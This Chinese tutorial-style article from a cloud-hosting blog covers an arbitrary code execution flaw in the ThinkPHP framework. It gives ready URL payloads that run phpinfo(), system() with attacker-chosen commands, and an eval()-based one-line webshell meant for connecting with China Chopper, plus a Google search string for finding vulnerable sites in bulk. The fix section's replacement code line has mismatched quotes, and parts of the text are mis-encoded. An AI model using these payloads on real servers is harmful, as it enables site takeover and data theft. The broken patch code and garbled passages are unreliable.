您好,登錄后才能下訂單哦!
這篇文章主要講解了“如何利用及修復ThinkPHP框架任意代碼執(zhí)行漏洞”,文中的講解內(nèi)容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“如何利用及修復ThinkPHP框架任意代碼執(zhí)行漏洞”吧!
近期thinkphp框架爆出了一個任意代碼執(zhí)行漏洞,其危害性相當?shù)母?漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函數(shù),比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以獲取服務器的系統(tǒng)配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出網(wǎng)站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接執(zhí)行一句話代碼,用菜刀直接連接.
這樣黑客們就可以直接通過google批量搜索關(guān)鍵字:thinkphp intitle:系統(tǒng)發(fā)生錯誤 來獲取更多使用thinkphp框架的網(wǎng)站列表??梢娖湮:π韵喈?shù)拇蟆?br/>
thinkphp框架執(zhí)行任意代碼漏洞修復方法:
用戶可下載官方發(fā)布的補?。?br/>
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源碼:
將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改為:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
將preg_replace第二個參數(shù)中的雙引號改為單引號,防止其中的php變量語法被解析執(zhí)行。
感謝各位的閱讀,以上就是“如何利用及修復ThinkPHP框架任意代碼執(zhí)行漏洞”的內(nèi)容了,經(jīng)過本文的學習后,相信大家對如何利用及修復ThinkPHP框架任意代碼執(zhí)行漏洞這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關(guān)知識點的文章,歡迎關(guān)注!
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。